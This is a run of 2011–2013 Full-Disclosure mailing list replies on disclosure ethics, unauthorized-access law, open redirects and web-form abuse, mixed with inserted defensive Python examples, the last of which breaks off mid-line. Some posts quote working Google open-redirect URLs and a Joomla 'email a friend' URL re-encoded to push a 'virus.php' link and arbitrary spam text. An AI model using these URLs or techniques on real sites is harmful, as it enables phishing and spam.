Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution

2013-03-07 Thread Nick FitzGerald
adam replied to himself:

> > The original page has been deleted?
>
> Screenshot for anyone who might have missed it (before cache is removed):
> 
> http://img842.imageshack.us/img842/7351/sansphpportscannerfdpng.png

Or, if you want actual editable content, you could try this thing 
called the Google cache...

Search Google for the original URL:

   http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/

et voila!



Regards,

Nick FitzGerald


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250,000

2013-01-21 Thread Nick FitzGerald
Sanguinarious Rose to me:

> And that is the reason why no one wants to report anything they find,
> it's because of people like you and your kind of thinking.

As you seem to have assumed a whole bunch about "my kind of thinking" 
that I did not put in the original post, I find the above laughable.

> Did they public post all the private information?
> No

Agreed.

> Did they try to use it for malicious or illicit purposes?
> No

Not that we know from what seems to be a rather one-sided, self-serving 
to the victim, "the system screwed poor little me" telling of the 
story.

> Did they report it when they found it?
> Yes

Agreed.

> A horrible moral compass indeed!  ...

No -- I said nothing about what could or should be considered about 
their moral compass _in finding_ the problem.  I did say they probably 
broke _both_ school/other ToS agreements and unauthorized access laws, 
but I did not say what I felt about that.

It is often the case that minor transgressions of such nature are 
necessary in doing many useful things in the computer security domain.  
That alone makes it precarious territory in which to work and such 
issues should obviously be front-of-mind for _anyone_ potentially in 
such territory.

> ...  Arrest these people for being
> concerned and reporting it after stumbling upon security flaws!
> Amiright?

No, I did not say that either.

What you seem to have missed (other than that you are reading things 
into my previous post that are not there) was that _after_ these two 
students notified the relevant system owners/operators and/or vendors, 
apparently only _one_ of them went back and did stuff that he probably 
should not have originally done (but that we can _probably_ excuse 
because of a "greater good"), _again_.

_That_ is what tells us something critical about _his_ moral compass 
(either he does not have one, it is rather under-developed for a 
20-year-old or it is rather broken).

Did you notice that this story was not titled "Youths expelled..." or 
"Students expelled..." _despite_ the first sentence of any substance in 
the National Post article starting:

   Ahmed Al-Khabaz ... was working on a mobile app ... when he and a
   colleague discovered what he describes as "sloppy coding" in ...

Did you notice how the rest of story fails to mention that his 
colleague was expelled?

Poor journalism, missing a fairly major fact in the story?

Or perhaps evidence that his "colleague" was not expelled because his 
colleague did not continue to mess with stuff that he should have (now) 
known he should not be messing with?

If _both_ students had been expelled, surely the tone of indignation 
and righteousness would have been greater, so I doubt the fact that the 
article only talks of one student being expelled is due to journalistic 
oversight...

So, Mr Rose, do you now see what you chose to avoid noticing on your 
first pass through this story and its "clever hacker cruelly 
ostracized" skew?



Regards,

Nick FitzGerald




Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250,000

2013-01-21 Thread Nick FitzGerald
Hi all,

Jeffrey Walton to me:

> > [...]
> > BUT he has no responsibility to check on anyone _else's_ data and no
> > _authority_ to use anyone else's credentials to check on his own.
> I would argue that's part of testing the system. If I log in and get a
> token back, I'm going to try a simple increment (and other
> transformations on the token) to see if its predictable. If I happen
> to get another's record, that demonstrates the flaw in the system and
> not 'testing on behalf of another'.

Which may well put you on very thin legal ice.

According to at least one legal ruling in Germany, it is "hacking" (as 
in the negative, illegal kind) to deliberately try to access upper-level 
directories of _published_ URLs _if_ the specific URLs to those 
resources have not also been made publicly available, _despite_ that 
they are necessarily discernible from the published URL.  Silly as that 
may seem, I'm pretty sure that tweaking tokens in cookie values and the 
like would be equally, if not more, egregious "hacking" in front of 
that court.

> What did he do with the other records he retrieved? I suspect he used
> them as proof of concept; and did not use them for a work visa or
> credit card. But I could be wrong.

Indeed, we do not know, but as there is no suggestion that anything 
further was done with whatever records were "illicitly" accessed, I 
suspect that nothing is what was done with that data (and it seems 
likely the heavy-handed legalistic mouthings of the vendor spokespeople 
would have touched on this if they had any inkling or evidence that 
such had happened).

> > So, what "responsibility" does he really have?
> We have the responsibility to protect our own data, because class-A
> fuckups like Omnivox don't do it. Once the data is lost, you can't get
> it back - the genie is out of the bottle.

Sadly, you cannot protect it when it is already in others' hands...

It seems that, in general, once you've _en_trusted such data to others 
our (current) legal system is of the opinion that you have accepted 
that you _trust_ their ability to maintain its confidentiality, etc.

This is not good, but it's also very difficult to see how an individual 
can really do much _useful_ about that either.

A lot of our "technological advances" have come at the cost of a loss 
of a lot of control of confidentiality of information.  This is a 
trade-off that many have probably made without even realizing it, and 
certainly without realizing the _scale_ of it.

> That's coming from a guy who was part of a breach in the 1990s. It
> cost me about $10,000 to fix it back then. It started again in the
> mid-2000's. I'm not fixing it this time.

I'm sorry, for you, to hear this.

> > It sounds like he should have left well alone once he had reported this
> > to the university and the vendors.  That he did not have the sense or
> > moral compass to recognize that tells us something important about him.
> Does that sword cut both ways? How about Nokia/Opera and their
> destruction of the secure channel? How about Trustwave and their
> fraudulent certificates that destroyed the secure channel?
> 
> Or do these things (law and moral compasses) only apply to individuals?

In my previous message I did not address the responsibilities -- nor 
their common, commonly egregious and often entirely predictable failing 
of such -- of those holding personal, confidential, etc data.

I think my opinion of that part of the industry, in general, is pretty 
obvious though, from this and many other messages I have posted to 
public lists like this...

Sadly, as I said above, our legal (and perhaps societal) mechanisms 
have not yet caught up with the implications of our recent (last ~70 
years) technological progress in the areas of data processing, 
retention, sharing and mining.  I suspect though, that on balance, it 
is probably better that such legalistic and societal changes lag such 
technological advances, but I also suspect we are getting to the point 
where that gap may be too large and too much power (or too little real 
responsibility) will end up in the hands of those who clearly should 
not only be doing more, but should be expected and required to do more.



Regards,

Nick FitzGerald




Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250,000

2013-01-21 Thread Nick FitzGerald
Jeffrey Walton wrote:

> On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse wrote:
> > Moreover, he ran it again after reporting it to see if it was still there.
> > Essentially he's doing an unauthorised pen test having alerted them that
> > he'd done one already.
> If his personal information is in the proprietary system, I believe he
> has every right to very the security of the system.

BUT how can he "verify" (I assume that was the word you meant?) proper 
security of _his_ personal details?  He would have to test using 
someone _else's_ access credentials.  That is "unauthorized access" by 
most relevant legislation in most jurisdictions.

Alternately, he could try accessing someone else's data from his login, 
and that is equally clearly unauthorized access.

He and his colleague who originally discovered the flaw may have used 
each other's access credentials to access their own data, or used their 
own credentials to access the other's data _in agreement between 
themselves_ BUT in so doing most likely broke the terms of service of 
the system/their school/etc, _equally_ putting them afoul of most 
unauthorized access legislation.

> Is he allowed to "opt-out" of the system (probably not)? If not, he
> has a responsibility to check.

BUT he has no responsibility to check on anyone _else's_ data and no 
_authority_ to use anyone else's credentials to check on his own.

So, what "responsibility" does he really have?

It sounds like he should have left well alone once he had reported this 
to the university and the vendors.  That he did not have the sense or 
moral compass to recognize that tells us something important about him.



Regards,

Nick FitzGerald




Re: [Full-disclosure] how to sell and get a fair price

2013-01-15 Thread Nick FitzGerald
Jeffrey Walton wrote:

> Sometimes the publisher cannot protect the identity of an anonymous
> author.  ...

That may be true -- I don't know...

> ...  The real Rex Feral was dragged into court.
> 
> http://en.wikipedia.org/wiki/Hit_Man:_A_Technical_Manual_for_Independent_Contractors

...but that claim is not supported by your reference.

The Wikipedia article simply does not address whether the pseudonymous 
author's real identity was exposed in the legal proceedings or not.  
Note that the case was "Rice v Paladin Enterprises" and the legal claim 
was that Paladin (the _publishers_) aided and abetted a murder.

Presumably (again, IANAL) they could have brought a similar suit 
against the author, but saw the publisher as having deeper pockets (and 
perhaps reasonably assumed, or even knew, that the publisher would have 
extensive commercial insurance to cover any damages ruling they may 
receive if their case prevailed).



Regards,

Nick FitzGerald




Re: [Full-disclosure] Question regarding script vulnerabilities

2012-12-20 Thread Nick FitzGerald
Rand wrote:

> I was curious, if you have a virtual dedicated server or a dedicated
> server, and a reasonably trustworthy hosting service, are malicious scripts
> planted by external people a big concern? If so why?

If you have a web server, malicious scripts should be a big concern to 
you, yes.

Why would you NOT be concerned that the integrity of your site and the 
server running it may be compromised?

Answering your "why" question is focussing on the wrong issue, as 
you've rather glibly skipped over a much more important issue -- what 
is the basis of your assessment that a hosting service is "reasonably 
trustworthy"?

Every site owner/admin on every one of the hundreds of compromised 
sites I've had dealings with this year alone was (at least before they 
finally recognized they were hosed) of the opinion that their hosting 
provider was (at least) "reasonably trustworthy".

They were all -- clearly -- wrong _if_ by that assessment they (and 
presumably you) were of the opinion that a "reasonably trustworthy" 
hosting provider will not have site/server compromise issues.

I have to assume that they are representative of the many, many, many 
hundreds more site owners/operators who never engaged further with my 
response to their request for information about why their site was 
"blacklisted".

So, what critical baggage are you hiding inside your assessment that a 
hosting provider is "reasonably trustworthy"?



Regards,

Nick FitzGerald




Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-14 Thread Nick FitzGerald
Benji wrote:

> Oracle attacks?
> 
> See into the future?
> Padding oracle attacks?
> Oracle SQL injections?

You noobs...

   http://www.drdobbs.com/understanding-oracle-attacks-on-informat/184405917

(Don't get too tied up in the crypto stuff in that article.)

klondike's point is that simply monitoring the response of the "user X 
wants to change their password" web-form tells you whether there is, in 
fact, a user named "X" on the system.  That's kinda obvious from the 
bash script klondike provided, and I don't do bash...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Full-Disclosure Digest, Vol 93, Issue 11

2012-11-12 Thread Nick FitzGerald
Scott Miller wrote:

> You seem to be assuming that denying a random user access to FB is a 
> security liability ;>]

Indeed -- sounds more like a useful public service...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-10 Thread Nick FitzGerald
Laurelai wrote:

> ... really i ask a
> simple question on how to avoid state sponsored malware that runs
> exclusively on windows platforms and not a single one of you said
> anything about using an alternate OS, some of you insisted in fact we
> should just lie down and take it. You aren't security experts you are
> scam artists. Makes me wonder if you are paid to act this way or if you
> all really just didnt consider it. Either answer is pretty chilling.

I was trying to keep right out of this one, but...

OK -- that was not actually quite what you asked, but as you have now 
asked it this way, I'll reply to this version of your question.

The "state-sponsored malware" you're talking about arose as part of a 
plan to execute a (more-or-less) targeted attack.  That meant that it 
had to target the OS of the intended victim(s).

Not much use writing a brilliant attack against IIS 7 when the target's 
webserver runs Apache 2.2.21 on some BSD.

"Not running Windows", as a general policy to adopt in order to prevent 
yourself or your organization from potentially feeling the unintended 
side-effects of some state-sponsored malware "going feral", will likely 
be about as useful as "not running Windows" as a general policy to 
avoid malware (under the assumption that likely targets of 
state-sponsored malware will sample target platforms in roughly the 
same way that the rest of the population will).

As changing the whole of your IT infrastructure, recovering the value 
of the training, experience, etc of your staff in using that 
infrastructure, etc, etc, is something that most organizations either 
have not considered, or have considered and (mostly) rejected, you will 
have to show us a major additional increase in risk that 
state-sponsored malware brings to the table before the ROI of changing 
IT infrastructure starts to stack up economically.

Just tacking the adjective "state-sponsored" in front of the term does 
not do that (well, except, perhaps, for a few folk at the really 
maladjusted ends of some or other psychiatric spectra).



Regards,

Nick FitzGerald




Re: [Full-disclosure] STEP Security

2012-04-01 Thread Nick FitzGerald
> Interweb Re-Engineering Task Force   J. Oquendo
> Request for Comments 4012012  E-Fensive Security Strategies
> Category: Informational
> Expires: 2020

Really?

You went to all that trouble to do an extended textual version of the 
funnier, and much more succinct:

   http://www.ranum.com/security/computer_security/papers/a1-firewall/index.html

(And which has been around, in slowly evolving form, since sometime in 
1994!)



Regards,

Nick FitzGerald




Re: [Full-disclosure] is my ISP lying or stupid?

2012-03-16 Thread Nick FitzGerald
And your reason for not considering "both" at all likely, is?




Regards,

Nick FitzGerald




Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins

2012-01-25 Thread Nick FitzGerald
Andrew Farmer wrote:

> Alternatively (also, a more memorable link):
> 
> http://www.internetargument.com/

I think the sentiment in that one is overstated.

"Usually" -- really?

"Sometimes" maybe...

"Aspiring to" -- getting closer...




Regards,

Nick FitzGerald




Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

2012-01-24 Thread Nick FitzGerald
Ben Bucksch wrote:

> Even then, that is not sufficient, as explained in length.

No -- what you "explained in length" _and_ seem impervious to 
understanding, despite a couple of respondents explaining it quite 
clearly, is that you have chosen to perform ongoing "sensitive" work in 
an environment where doing so, at best, represents a highly 
questionable security stance.

_Part_ of what contributes to that questionability is your choice to 
more-or-less continuously run an application that you should always 
have known leaks access to the clipboard of what you oddly choose to 
describe as a "trusted desktop" (odd, because you should know that 
exposing the host clipboard to the client is common -- in fact, 
probably the standard default -- functionality of VNC clients).

That your chosen/preferred/whatever VNC client does not allow you to 
turn off, or otherwise modify or monitor this functionality is not a 
security vulnerability or bug, as you seem intent on portraying it.  It 
may be an undesirable feature (or, more accurately, lack of a feature) 
but don't you have other VNC clients to choose from?  Must you use this 
particular VNC client?  If so and this method of working is so critical 
to you, should you not choose a different platform for your "trusted 
desktop" and run a more suitably configurable VNC client?  Or, if your 
sensitive work is really that sensitive, should you not invest in a 
second machine for remotely monitoring/interacting with the 
untrusted, sandboxed applications you need to run, so that they really 
are securely separated (can we all say "air gap"?) from your more 
"sensitive" operations?  It would not have to be a very heavy-duty 
machine -- a very low-end netbook style machine, or possibly even a 
cheap tablet-style device may more than suffice...

...

Another part of that questionability is obvious to anyone with nous 
reading this list...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Full-Disclosure Digest, Vol 83, Issue 21

2012-01-18 Thread Nick FitzGerald
BMF to Valdis:

> > Yes, people *have* been prosecuted for playing "twiddle the URL" games
> > before.  I'd have to go dig up a cite, but it's happened (hacker was
> > basically abusing a site's predictable URL scheme).
> 
> Here is one relatively recent incident of "twiddle the URL" which got
> someone prosecuted and will be familiar to some here...
> 
> http://simonhunt.wordpress.com/2011/01/19/two-charged-with-data-theft-from-june-10s-att-hack/

That's not really "twiddle-the-URL is hacking" though.

They allegedly (cough, splutter!) knowingly and wilfully twiddled a 
specific URL in a specific way that they had already determined led to 
the exposure of account details of users other than themselves, et seq. 
If that is the case they clearly were in breach of all manner of 
"unauthorized access" laws.  That has little to do with true 
"twiddle-the-URL is hacking".

To get a "purer" example of "twiddle-the-URL is hacking", I seem to 
recall that there was a German case back in the late 90s/very early 
00s where the court ruled that a trivial act of "URL pruning" -- taking 
a published URL and removing the tail, and/or traversing back up the 
directory tree exposed by the _published_ URL -- was an act of 
"hacking" (I don't recall the exact German legal issue/charge, but am 
fairly sure it was something other than a trivial/silly (mis-) 
application of "unauthorized access").

I can't be bothered trying to find a record of that case -- previous 
attempts last time I recall this issue arising in this list failed -- 
but I will refer you to a UK case from 2005:

   http://www.theregister.co.uk/2005/10/06/tsunami_hacker_convicted/

   http://www.pmsommer.com/CLCMA1205.pdf

Basically, given a URL like http://example.com/?foobar or 
http://example.com/foobar.php has been published in some way, and 
http://example.com/ has not, this case suggests that trying to access 
that second URL is an "unauthorized access" offence.  In particular, 
note from p. 2 of the PDF in the second URL, above:

   But the prosecution said that Cuthbert must have known the directory
   traversal was unauthorised. It was this interpretation the court
   accepted; in effect, overall intent was irrelevant, there were no
   circumstances in which there was consent for directory traversal.

This conviction seems to be pretty widely seen as a trivial/silly 
misapplication of the UK's Computer Misuse Act "unauthorized access" 
offence:

   http://www.legislation.gov.uk/ukpga/1990/18/section/1

There are bound to be other vaguely similar cases in the UK and other 
jurisdictions.



Regards,

Nick FitzGerald




Re: [Full-disclosure] Is Your Online Bank Vulnerable To Currency Rounding Attacks?

2012-01-09 Thread Nick FitzGerald
adam to Jeffrey Walton to Memory Vandal to Jeffrey Walton:

> > >> I believe the term is "arbitrage" (not rounding attacks).
> > >
> > > Nope: https://en.wikipedia.org/wiki/Arbitrage
> > http://www.google.com/?q=currency+arbitrage. *sigh*.
> 
> Plus:
> 
> https://www.google.com/?#q=arbitrage&tbs=dfn:1&fp=1

Now, it may be fashionable to bag ACROS here due to their initially 
over-zealous description of the likely magnitude of the "binary 
planting" "vulnerability", BUT did any of you _other than Memory 
Vandal_ actually read the ACROS blog _at all carefully_?

If so _and_ you really understand what arbitrage is, you would 
recognize that Memory Vandal is right -- this ain't arbitrage, at least 
not as classically understood.

Let's look at your own justifications of your incorrect positions...

To quote the first result in adam's search:

   The simultaneous buying and selling of securities, currency, or
   commodities in different markets or in derivative forms in order to
   take advantage of differing prices for the same asset

To quote the first result from Jeffrey's search:

   A forex strategy in which a currency trader takes advantage of
   different spreads offered by brokers for a particular currency pair
   by making trades. Different spreads for a currency pair imply
   disparities between the bid and ask prices. Currency arbitrage
   involves buying and selling currency pairs from different brokers to
   take advantage of this disparity. 

   For example, two different banks (Bank A and Bank B) offer quotes
   for the US/EUR currency pair. Bank A sets the rate at 3/2 dollars
   per euro, and Bank B sets its rate at 4/3 dollars per euro. In
   currency arbitrage, the trader would take one euro, convert that
   into dollars with Bank A and then back into euros with Bank B. The
   end result is that the trader who started with one euro now has 9/8
   euro. The trader has made a 1/8 euro profit if trading fees are not
   taken into account.

So, we see that arbitrage involves playing a difference in cross-rates 
_between two [or more] markets_.

As the ACROS folk carefully and clearly point out, _if_ you actually 
bothered to read the whole article at all closely, the issue they are 
describing is purely possible due to _the customer_ executing trades at 
one level of mathematical precision (as provided by the bank) and _the 
bank_ rounding the payout to the customer to a lesser degree of 
precision.  _If_ the customer is able to take advantage of this 
situation _at a small enough unit of currency_ the rounding "error" 
(it's not really an error, but it contributes to what the bank may 
consider an erroneous or undesirable outcome) will swamp the _loss_ 
that should be expected in the actual trade (ACROS went to some length 
to explain that the trade should actually make a loss -- that is, after 
all, how banks make a profit on currency trades -- _and_ explained the 
magnitude of this loss -- if you missed that, go read it again).

Also, notice that _if you already have USD_ (an entirely likely, even 
probable situation here) there is only one direction of trading 
necessary here, so clearly not arbitrage at all.

So, adam and Jeffrey, much as you may not be pre-disposed to accept 
what ACROS might say, you are wrong about this being simple arbitrage 
and ACROS is correct that it is all about rounding practices and banks 
trading currencies at different levels of precision from that at which 
they payout transactions (the latter is typically due to the fact that 
historically currency is always tracked in whole units of the smallest 
denomination, or perhaps more accurately, in whole single units of the 
smallest denominational breakdown -- in NZ, my bank tracks my accounts 
to the cent, but as NZ's smallest legal tender coin is now 10c, if I 
cash out an account, they will round the payout to a 10c boundary).



Regards,

Nick FitzGerald
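As an added worked example (not from the ACROS post, nor Nick's own), the mechanism described above in Python's Decimal: the trade is computed at full precision, the payout is rounded half-up to the cent, and for small enough trades the rounding gain swamps the spread loss. The rates (1.3000 USD per EUR mid-market, 0.7600 EUR paid per USD sold), the amounts and the function names are assumptions for illustration; the block also shows the two mitigations a bank has, rounding the payout in its own favour and refusing trades below the break-even size.

```python
from decimal import Decimal, ROUND_HALF_UP

CENT = Decimal("0.01")

# Constructed rates (assumptions for this example, not the ACROS figures):
# mid-market is 1.3000 USD per EUR and the bank pays 0.7600 EUR per USD sold,
# so a customer selling USD "should" lose about 1.2% to the spread each trade.
MID_USD_PER_EUR = Decimal("1.3000")
BANK_EUR_PER_USD = Decimal("0.7600")


def D(x) -> Decimal:
    """Accept Decimal or str amounts; never build money Decimals from floats."""
    return x if isinstance(x, Decimal) else Decimal(str(x))


def fair_value_eur(amount_usd) -> Decimal:
    """EUR value of amount_usd at the mid-market rate, at full precision."""
    return D(amount_usd) / MID_USD_PER_EUR


def payout_eur(amount_usd, rounding: str = ROUND_HALF_UP) -> Decimal:
    """EUR the bank credits for selling amount_usd: the trade itself is
    computed at full precision, then the payout is rounded to the cent using
    `rounding`, a decimal mode name such as "ROUND_HALF_UP" or "ROUND_DOWN"."""
    return (D(amount_usd) * BANK_EUR_PER_USD).quantize(CENT, rounding=rounding)


def customer_edge_eur(amount_usd, rounding: str = ROUND_HALF_UP) -> Decimal:
    """Customer's gain (positive) or loss (negative) against fair value."""
    return payout_eur(amount_usd, rounding) - fair_value_eur(amount_usd)


def simulate(trade_usd, n_trades: int, rounding: str = ROUND_HALF_UP) -> Decimal:
    """Net EUR result for a customer who sells trade_usd n_trades times."""
    return customer_edge_eur(trade_usd, rounding) * n_trades


def break_even_usd() -> Decimal:
    """Trade size at which the largest possible rounding gain (half a cent
    under round-half-up) equals the spread loss; smaller trades can net a gain."""
    loss_per_usd = Decimal(1) / MID_USD_PER_EUR - BANK_EUR_PER_USD
    return (CENT / 2) / loss_per_usd


def accept_trade(amount_usd, min_trade_usd=None) -> bool:
    """Mitigation 1: refuse trades too small for the spread to cover rounding.
    Defaults to the computed break-even size."""
    floor = D(min_trade_usd) if min_trade_usd is not None else break_even_usd()
    return D(amount_usd) >= floor


if __name__ == "__main__":
    for usd in ("0.01", "0.10", "0.54", "0.55", "1.00"):
        print(f"sell {usd} USD: payout(half-up)={payout_eur(usd)} "
              f"payout(down)={payout_eur(usd, 'ROUND_DOWN')} "
              f"edge(half-up)={customer_edge_eur(usd):+.4f} "
              f"accepted={accept_trade(usd)}")
    print(f"break-even trade size: {break_even_usd():.4f} USD")
    print(f"1000 x 0.01 USD, half-up: {simulate('0.01', 1000):+.2f} EUR")
    # Mitigation 2: round the payout in the bank's favour.
    print(f"1000 x 0.01 USD, round-down: "
          f"{simulate('0.01', 1000, 'ROUND_DOWN'):+.2f} EUR")
```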




Re: [Full-disclosure] Two other Google open redirects

2011-12-13 Thread Nick FitzGerald
Riyaz Walikar wrote:

> Here's another open redirect that works.
> https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.bing.com

Nice.

That's a bit like the "backlink" ("bl") one from the settings page on 
the mobile page that Google fixed a week or so back after the spammers 
had been hammering away at it for a month or more.

> This works as well.
> https://www.google.com/search?btnI&q=http://www.bing.com

That is the very long-known "I'm Feeling Lucky" search open redirector.

   http://www.virusbtn.com/resources/spammerscompendium/lucky.xml

Again, the spammers used that for ages, but I was fairly sure that it 
had been fixed.

Michal, Tavis -- regression management problems in the Googleplex?

Surely not...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Google open redirect

2011-12-07 Thread Nick FitzGerald
secure poon wrote:

> Problem:
> 
> Google suffers from an open redirect that can be used to trick users into
> visiting sites not originating from google.com

No -- the real problem here is that Google never learns from these...

> Example:
> 
> http://www.google.com/local/add/changeLocale?currentLocation=http://www.bing.com
> 
> http://www.google.com/local/add/changeLocale?currentLocation=http://www.tubgirl.ca

Just like all the ones that came before and all the new ones some or 
other moron at Google will devise tomorrow, next Wednesday, etc, etc.

_Open_ URL redirectors are trivially prevented by any vaguely sentient 
web developer as URL redirectors have NO legitimate use from outside 
one's own site so should ALWAYS be implemented with Referer checking, 
ensuring they are not _open_ redirectors...

(And yes, that means that URL shorteners _as a group_ have no 
legitimate use.)

Apparently Google's web developers are so stubbornly unable to absorb 
this simple notion that it has become company policy that officially 
Google does not care about open redirectors:

   http://www.google.com/about/corporate/company/rewardprogram.html#url-redirection

Notice they do not distinguish between "URL redirectors" (almost 
necessary in many website designs, including their own) and _open_ 
redirectors (the work of ignorant web designers who do not care about 
the reputation of their site/brand/etc).  I'd have thought that "good 
sites" (i.e. "non-evil" ones) would be expected to not want their 
reputation sullied by the kind of trivially prevented reputation abuse 
that _open_ URL redirectors provide.

But we are talking about Google...



Regards,

Nick FitzGerald
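As an added example (not code from the original post, and not Google's), a redirect handler in Python that applies the Referer check Nick describes and, because browsers omit Referer in a number of situations, also restricts the destination to an allowlist of the site's own hosts, which is what actually stops it being an _open_ redirector. The hostnames www.example.com and accounts.example.com, and the function names, are assumptions.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed names: the hosts this site regards as its own. Only they may be
# redirect destinations, and only requests referred from them are honoured.
SITE_HOSTS = frozenset({"www.example.com", "accounts.example.com"})
DEFAULT_HOST = "www.example.com"


def host_of(url: str):
    """Lower-cased hostname of url (port and userinfo stripped), or None."""
    try:
        return urlsplit(url).hostname
    except ValueError:
        return None


def referer_is_own_site(referer) -> bool:
    """The Referer check: refuse when the header is absent or names a foreign
    host. Referer is suppressed by referrer policies and some clients, so on
    its own this also turns away some legitimate users."""
    return bool(referer) and host_of(referer) in SITE_HOSTS


def safe_redirect_target(target: str, referer, allowed_hosts=SITE_HOSTS):
    """Return an absolute https URL on an allowed host to redirect to, or
    None when the request must be refused (the caller then sends the user to
    DEFAULT_HOST's front page instead of the requested location)."""
    if not referer_is_own_site(referer):
        return None
    if not target or any(ord(c) < 0x20 or c == "\\" for c in target):
        # control characters (Location header injection) and backslashes,
        # which browsers treat as slashes, so "/\\evil" would become "//evil"
        return None
    try:
        parts = urlsplit(target)
    except ValueError:
        return None
    if parts.scheme not in ("", "https"):
        return None  # blocks javascript:, data:, http:, ftp: and friends
    if not parts.netloc:
        # A genuine same-site path. "//host/..." parses with a netloc, so it
        # never reaches this branch; "https:evil" has a path without a slash.
        if not parts.path.startswith("/"):
            return None
        return urlunsplit(("https", DEFAULT_HOST, parts.path,
                           parts.query, parts.fragment))
    if parts.username is not None or parts.password is not None:
        return None  # https://www.example.com@www.bing.com/ style trick
    if parts.hostname not in allowed_hosts:
        return None  # includes www.example.com.bing.com and bare bing.com
    return urlunsplit(("https", parts.netloc, parts.path,
                       parts.query, parts.fragment))
```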




Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-21 Thread Nick FitzGerald
Will McAfee wrote:

> Less funny than yesterday's.  Just stop.

More predictable than yesterday's.  Just stop.



Regards,

Nick FitzGerald




Re: [Full-disclosure] Phone Scam

2011-07-20 Thread Nick FitzGerald
Andy McKnight wrote:

> ...  A couple of people reported
> potentially the same guy calling, 'Paul' from Microsoft

Or they're reading from the same script...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Joomla Content Manager 1.5 Mail Fun

2011-07-10 Thread Nick FitzGerald
Tomm Foo wrote:

> This might be old, but I find this interesting enough that I'll share just in
> case.

Dunno if this specific one is known, but spammers (especially 419'ers) 
have been abusing these poorly implemented "Email a friend" type 
functions on web pages for quite some time...

> By accident I ran across several sites that allow you to send an email
> containing a link to whatever site you please from any sender you choose,
> all under the header of a presumably legitimate site.
> 
> An example,
> 
> https://www.1stprioritymortgage.com/index.php?option=com_mailto&tmpl=component&link=aHR0cHM6Ly93d3cuMXN0cHJpb3JpdHltb3J0Z2FnZS5jb20vaW5kZXgucGhwP3ZpZXc9YXJ0aWNsZSZpZD04NCUzQXNpdGUtbWFwJm9wdGlvbj1jb21fY29udGVudCZJdGVtaWQ9OTM=
> 
> (found by clicking the mail button on all the article pages containing this
> software) will send the recipient you designate a link to the page you were
> viewing. However, by changing the base64 code above to a link of your own
> works as well, thus
> 
> https://www.1stprioritymortgage.com/index.php?option=com_mailto&tmpl=component&link=Cmh0dHA6Ly93d3cuZXZpbGdheXNleC5jb20vdmlydXMucGhwPz1sb2wK
> 
> will be sent to the recipient instead. Spoof a legitimate page and you could
> easily snag the clueless plebe into visiting somewhere much more nasty.

Of course, that Base64-encoded string need not decode to a URL...

You can Base64 encode any message body you desire (length limits not 
tested) and stick that in as the link parameter to the URL.  The 
server-side processor happily decodes that and adds that text to its own 
(quite brief in this case) message body.  As the sent messages are:

   Content-Type: text/plain

some of the cleverness that other such "Email a friend" forms have 
(quite unintentionally) allowed with HTML content are not available.

Oh, and there is an issue with "+" chars in the Base64-encoded text 
passed back to the form processor (they get turned into spaces and 
dropped, as you may expect).

A good thing this particular instance has that many others don't is 
that it tries to prevent multiple addresses being entered via the form, 
making it somewhat less spammer-friendly (though I've seen many 
instances where 419's apparently c'n'p the same stuff over and over 
into the same form, with a different Email address each time or maybe 
have automated it to do one address at a time).



Regards,

Nick FitzGerald


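The weakness in the post above is a Base64 "link" value that the form processor decodes and drops into the mail body without checking what it decoded to. Added example (not Joomla's com_mailto code): a strict decoder that only accepts a single-line http(s) URL on the site's own host, beside a demonstration of why a raw '+' in standard Base64 is mangled by form decoding. Every host, URL and value is constructed for illustration.

```python
"""Hardened handling of a Base64 "link" parameter for an "Email a friend"
form. Added example, not Joomla's com_mailto code; every host, URL and
value below is constructed for illustration."""
import base64
import binascii
from urllib.parse import unquote_plus, urlsplit


def standard_b64(url: str) -> str:
    """Standard Base64, as the form in the post uses; its alphabet contains
    '+' and '/', which are not safe to put raw into a query string."""
    return base64.b64encode(url.encode("utf-8")).decode("ascii")


def urlsafe_b64(url: str) -> str:
    """URL-safe Base64 ('-' and '_' instead of '+' and '/'): survives
    form decoding unchanged, so nothing is silently dropped."""
    return base64.urlsafe_b64encode(url.encode("utf-8")).decode("ascii")


def as_seen_by_form_processor(query_value: str) -> str:
    """What the server-side script receives: form decoding of a query
    string turns a raw '+' into a space."""
    return unquote_plus(query_value)


def validated_link(encoded: str, site_host: str):
    """Decode the parameter strictly and accept it only as a single-line,
    absolute http(s) URL whose authority is exactly our own host.
    Returns the URL, or None (fail closed) for anything else."""
    try:
        # validate=True: a space or any other non-alphabet byte is an error,
        # not something to skip over the way a lenient decoder does.
        raw = base64.b64decode(encoded, altchars=b"-_", validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    # Whitespace of any kind (newlines especially) means the value is a
    # message body, not a link, so it never reaches the outgoing mail.
    if not text or any(ch.isspace() for ch in text):
        return None
    parts = urlsplit(text)
    if parts.scheme not in ("http", "https"):
        return None
    # Compare the whole netloc, not just the hostname, so user-info or a
    # port cannot smuggle in a foreign authority.
    if parts.netloc.lower() != site_host.lower():
        return None
    return text


def demo():
    """Walk through the cases discussed in the post; returns a dict of
    named checks, all of which should be True."""
    site = "www.example.com"
    own_page = "https://www.example.com/index.php?view=article&id=84"
    # Constructed URL chosen so that its standard Base64 contains a '+'.
    std = standard_b64("http://www.example.com/~u")
    return {
        "own_page_ok": validated_link(urlsafe_b64(own_page), site) == own_page,
        "foreign_rejected": validated_link(
            urlsafe_b64("https://attacker.example/landing"), site) is None,
        "body_injection_rejected": validated_link(
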